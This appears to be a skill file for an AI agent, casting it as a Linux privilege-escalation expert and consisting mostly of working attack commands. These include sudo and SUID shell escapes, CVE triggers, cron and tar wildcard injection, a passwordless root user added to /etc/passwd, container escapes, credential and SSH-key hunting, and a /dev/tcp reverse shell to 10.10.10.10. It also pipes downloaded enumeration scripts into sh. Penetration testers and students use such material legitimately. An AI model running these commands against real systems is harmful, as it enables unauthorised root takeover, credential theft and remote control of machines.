gh-trilwu-secskills-secskills/skills/linux-privilege-escalation/SKILL.md

name, description

name	description
escalating-linux-privileges	Escalate privileges on Linux systems using SUID/SGID binaries, capabilities, sudo misconfigurations, cron jobs, kernel exploits, and container escapes. Use when performing Linux post-exploitation or privilege escalation.

Linux Privilege Escalation Skill

You are a Linux security expert specializing in privilege escalation techniques. Use this skill when the user requests help with:

• Escalating privileges on Linux systems
• Identifying misconfigurations and vulnerabilities
• Exploiting SUID/SGID binaries
• Abusing Linux capabilities
• Kernel exploitation
• Container escape techniques
• Sudo misconfigurations and bypasses
• Cron job exploitation
• Path hijacking attacks

Core Methodologies

1. Initial System Enumeration

System Information:

# OS and kernel version
cat /proc/version
uname -a
lsb_release -a
cat /etc/os-release

# Check for kernel exploits
searchsploit "Linux Kernel $(uname -r)"
uname -r

# CPU and system stats
lscpu
cat /proc/cpuinfo
df -h

Current User Context:

# Who am I?
id
whoami
groups
sudo -l

# Environment variables (passwords, API keys?)
env
set
cat /proc/self/environ | tr '\0' '\n'

# Check PATH for hijacking opportunities
echo $PATH

Users and Groups:

# All users
cat /etc/passwd
cat /etc/passwd | grep -v "nologin\|false" | cut -d: -f1

# Users with bash
cat /etc/passwd | grep "/bin/bash"

# User details
cat /etc/shadow  # If readable
cat /etc/group

# Home directories
ls -la /home/

2. Sudo Exploitation

Check Sudo Permissions:

# What can I run as root?
sudo -l

# Check sudo version for known vulns
sudo -V
sudo --version

Common Sudo Misconfigurations:

# NOPASSWD entries
sudo -l | grep NOPASSWD

# Wildcards exploitation
# If: (root) NOPASSWD: /bin/cp /tmp/* /var/www/html/
# Then: Create malicious file in /tmp, overwrite system files

# Shell escapes from sudo
# If you can run vim, less, more, man, etc. with sudo:
sudo vim -c ':!/bin/bash'
sudo less /etc/profile  # then !/bin/bash
sudo awk 'BEGIN {system("/bin/bash")}'
sudo find . -exec /bin/bash \; -quit
sudo nmap --interactive  # then !bash

Sudo CVEs:

# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2
sudoedit -s /
sudoedit -s '\' $(python3 -c 'print("A"*1000)')

# CVE-2019-14287 - Sudo < 1.8.28
# If: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash

# CVE-2019-18634 - Sudo pwfeedback
# Exploitable if pwfeedback is enabled in /etc/sudoers

GTFOBins for Sudo:

# Check https://gtfobins.github.io/ for specific binary
# Examples:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
sudo git -p help  # then !/bin/bash
sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh

3. SUID/SGID Binaries

Find SUID/SGID Files:

# Find SUID binaries (4000)
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# Find SGID binaries (2000)
find / -perm -2000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

# Find both SUID and SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null

# Interesting locations
find /usr/local/bin -perm -4000 2>/dev/null
find /usr/bin -perm -4000 2>/dev/null
find /bin -perm -4000 2>/dev/null

Exploiting SUID Binaries:

# Check GTFOBins for each SUID binary found
# https://gtfobins.github.io/

# Common exploitable SUID binaries:

# /usr/bin/find
find . -exec /bin/bash -p \; -quit

# /usr/bin/vim
vim -c ':py3 import os; os.execl("/bin/bash", "bash", "-pc", "reset; exec bash -p")'

# /usr/bin/nmap (old versions)
nmap --interactive
!sh

# /usr/bin/less
less /etc/profile
!/bin/bash

# /usr/bin/awk
awk 'BEGIN {system("/bin/bash -p")}'

# /usr/bin/perl
perl -e 'exec "/bin/bash";'

# /usr/bin/python
python -c 'import os; os.execl("/bin/bash", "bash", "-p")'

# /usr/bin/php
php -r "pcntl_exec('/bin/bash', ['-p']);"

# Custom SUID binary (check for command injection, buffer overflow)
strings /path/to/suid_binary
ltrace /path/to/suid_binary
strace /path/to/suid_binary

4. Linux Capabilities

What Are Capabilities: Capabilities divide root privileges into distinct units. A binary with specific capabilities can perform privileged operations without full root.

Enumerate Capabilities:

# Find binaries with capabilities
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null

# Check specific binary
getcap /usr/bin/python3.8

# Check process capabilities
cat /proc/self/status | grep Cap
getpcaps $$

# Decode capability value
capsh --decode=0000003fffffffff

Exploitable Capabilities:

# cap_setuid - allows changing UID
# Python with cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Perl with cap_setuid
perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash";'

# cap_dac_read_search - bypass file read permission checks
# tar with cap_dac_read_search
tar cvf shadow.tar /etc/shadow
tar -xvf shadow.tar

# cap_chown - change file ownership
# Python with cap_chown
python -c 'import os; os.chown("/etc/shadow",1000,1000)'

# cap_sys_admin - various admin operations (often container escape)
# Can mount filesystems, load kernel modules, etc.

# cap_sys_ptrace - inject code into processes
# gdb with cap_sys_ptrace
gdb -p <PID>
call system("id")

# cap_sys_module - load kernel modules
# Can load malicious kernel module for root

# cap_net_raw + cap_net_admin - network packet manipulation
# tcpdump with these caps can be used for ARP spoofing

5. Cron Jobs Exploitation

Enumerate Cron Jobs:

# System-wide cron
cat /etc/crontab
ls -la /etc/cron.*
ls -la /etc/cron.d/
ls -la /var/spool/cron/
ls -la /var/spool/cron/crontabs/

# User crontabs
crontab -l
crontab -l -u username

# Check for running cron
ps aux | grep cron
systemctl status cron

Exploiting Writable Cron Scripts:

# If a cron script is writable
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cron/script.sh
# Wait for cron to execute
/tmp/rootbash -p

# Reverse shell payload
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >> /path/to/cron/script.sh

PATH Exploitation in Cron:

# If cron uses relative paths without full path
# Example: /etc/crontab contains: * * * * * root backup.sh
# Create malicious backup.sh in /tmp/ and modify PATH
echo '/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash"' > /tmp/backup.sh
chmod +x /tmp/backup.sh

Wildcards in Cron:

# If cron job has: tar czf /backup/backup.tar.gz *
# Create malicious files
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > exploit.sh
chmod +x exploit.sh
touch -- --checkpoint=1
touch -- --checkpoint-action=exec=exploit.sh
# When tar runs with wildcard, it executes exploit.sh

6. Writable Files and Directories

Find Writable Files:

# World-writable files
find / -writable -type f 2>/dev/null | grep -v "/proc/"
find / -perm -2 -type f 2>/dev/null

# Files owned by current user
find / -user $(whoami) 2>/dev/null
find / -group $(groups | cut -d' ' -f1) 2>/dev/null

# Writable /etc/ files (critical)
find /etc -writable -type f 2>/dev/null

Critical Writable Files:

# /etc/passwd - add root user
echo 'newroot::0:0:root:/root:/bin/bash' >> /etc/passwd
su newroot

# /etc/shadow - overwrite root hash
# Generate hash: openssl passwd -6 password
# Replace root line

# /etc/sudoers - add sudo permission
echo 'username ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers

# /etc/crontab - add malicious cron
echo '* * * * * root /tmp/exploit.sh' >> /etc/crontab

# ~/.ssh/authorized_keys - add SSH key
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys

7. Kernel Exploits

Identify Kernel Version:

uname -a
cat /proc/version
uname -r

Search for Exploits:

# SearchSploit
searchsploit "Linux Kernel $(uname -r | cut -d'-' -f1)"
searchsploit "Linux Kernel 4.4"

# Google search
# Search: "Linux kernel X.X.X exploit"
# Search: "Linux kernel X.X.X privilege escalation"

# Automated tools
linux-exploit-suggester.sh
linux-exploit-suggester-2.pl

Common Kernel Exploits:

# DirtyCow (CVE-2016-5195) - Kernel <= 3.19.0-73.8
# https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

# CVE-2022-0847 (Dirty Pipe) - Kernel 5.8 - 5.16.11
# Overwrite read-only files

# CVE-2021-4034 (PwnKit) - PolicyKit
# Local privilege escalation via pkexec

# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2

# Compile and run
gcc -pthread exploit.c -o exploit -lcrypt
./exploit

Kernel Exploit Resources:

• https://github.com/lucyoa/kernel-exploits
• https://github.com/SecWiki/linux-kernel-exploits
• https://github.com/bwbwbwbw/linux-exploit-binaries

8. Container Escape

Detect if in Container:

# Check for .dockerenv
ls -la /.dockerenv

# Check cgroup
cat /proc/1/cgroup | grep docker
cat /proc/self/cgroup

# Check for container-specific files
ls -la /.containerenv  # Podman
cat /proc/1/environ | grep container

Container Escape Techniques:

# Privileged container with access to /dev
# Mount host filesystem
fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host

# Docker socket mounted (/var/run/docker.sock)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Cap_sys_admin capability
# Can mount host filesystem or abuse other admin functions

# containerd/runc escape (CVE-2019-5736)
# Overwrite runc binary on host

# Kubernetes pod escape
# Service account tokens: /run/secrets/kubernetes.io/serviceaccount/
kubectl --token=$(cat /run/secrets/kubernetes.io/serviceaccount/token) get pods

9. Password Hunting

Search for Passwords:

# Grep for password strings
grep -r "password" /home/ 2>/dev/null
grep -r "passwd" /var/www/ 2>/dev/null
grep -ir "pwd\|pass" /opt/ 2>/dev/null

# Configuration files
cat /var/www/html/config.php
cat /var/www/html/wp-config.php
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.ssh/id_rsa

# Database files
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null

# Check environment
env | grep -i pass

# Check for credentials in scripts
find / -name "*.sh" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.py" -exec grep -l "password" {} \; 2>/dev/null

# Memory dumps
strings /dev/mem
strings /proc/kcore

# SSH keys
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find / -name authorized_keys 2>/dev/null

10. NFS Exploits

Check NFS Shares:

# On target
cat /etc/exports
showmount -e localhost

# From attacker machine
showmount -e 10.10.10.10

# Common misconfig: no_root_squash
# /home *(rw,no_root_squash)

Exploit no_root_squash:

# On attacker (as root)
mkdir /tmp/nfs
mount -t nfs 10.10.10.10:/home /tmp/nfs
cd /tmp/nfs

# Create SUID binary
cp /bin/bash .
chmod +s bash

# On target
cd /home
./bash -p  # root shell

Automated Enumeration Tools

LinPEAS (Recommended):

# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or locally
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinEnum:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

Linux Smart Enumeration (LSE):

wget https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
chmod +x lse.sh
./lse.sh -l1  # Level 1 (fast)
./lse.sh -l2  # Level 2 (thorough)

pspy (Monitor Processes):

# Monitor for cron jobs and processes without root
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64

Troubleshooting

Exploit Not Working:

• Check architecture: uname -m (x86_64, i686, arm, etc.)
• Compile on target system if possible
• Check kernel version exactly matches exploit requirements
• Verify exploit is for correct Linux distribution
• Check for security mitigations (AppArmor, SELinux, ASLR)

SUID Binary Not Spawning Root Shell:

• Use -p flag to preserve privileges: /bin/bash -p
• Some shells drop privileges; try different shells
• Check if binary has capabilities instead of SUID

Cannot Compile Exploit:

• Transfer pre-compiled binary
• Cross-compile on attacker machine
• Use statically compiled binaries
• Check for gcc, g++, make on target

Permission Denied Errors:

• Check file permissions carefully
• Verify you're in correct group
• Check AppArmor/SELinux is not blocking
• Try different attack vector

Reference Links

• HackTricks Linux Privesc: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/linux-hardening/privilege-escalation
• GTFOBins: https://gtfobins.github.io/
• PEASS-ng (LinPEAS): https://github.com/carlospolop/PEASS-ng
• PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
• Linux Privilege Escalation Techniques: https://book.hacktricks.xyz/linux-hardening/privilege-escalation

When to Use This Skill

Activate this skill when the user asks to:

• Escalate privileges on a Linux system
• Enumerate Linux privilege escalation vectors
• Exploit SUID binaries or capabilities
• Abuse sudo misconfigurations
• Escape from containers
• Identify kernel exploits
• Find and exploit cron job weaknesses
• Analyze Linux security misconfigurations

Always ensure proper authorization before performing privilege escalation on any system.